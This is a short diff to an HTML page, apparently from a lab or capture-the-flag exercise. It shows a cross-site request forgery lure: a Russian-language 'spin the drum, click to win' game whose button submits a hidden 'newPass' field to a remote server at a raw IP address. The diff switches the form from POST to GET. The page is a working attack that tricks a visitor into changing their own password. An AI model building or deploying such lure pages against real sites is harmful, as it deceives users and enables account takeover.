--- a/csrf/index.html
+++ b/csrf/index.html
@@ -16,7 +16,7 @@
     <h3 id="SpinDrumText"> Скорее крутите барабан! Зрители ждут! </h3> <h3 id="SoSorryText">Очень жаль. вы проиграли, а ваше очко уходит в зрительный зал =(  </h3></div>
     <div id="ArrowDown">  </div>
     <div id="DrumBlock"> </div>
-    <form method="POST"  action="http://178.172.195.18:11166/csrf/index.php"><input class="form-control" width="1px" placeholder="New Password" name="newPass" value="test777" display="none"> <button type="submit" id="Button"><img src="rainbow.png"> Нажми чтобы выиграть! </button></form>
+    <form method="GET"  action="http://178.172.195.18:11166/csrf/index.php"><input class="form-control" width="1px" placeholder="New Password" name="newPass" value="test777" display="none"> <button type="submit" id="Button"><img src="rainbow.png"> Нажми чтобы выиграть! </button></form>
     <div> </div>
 
     
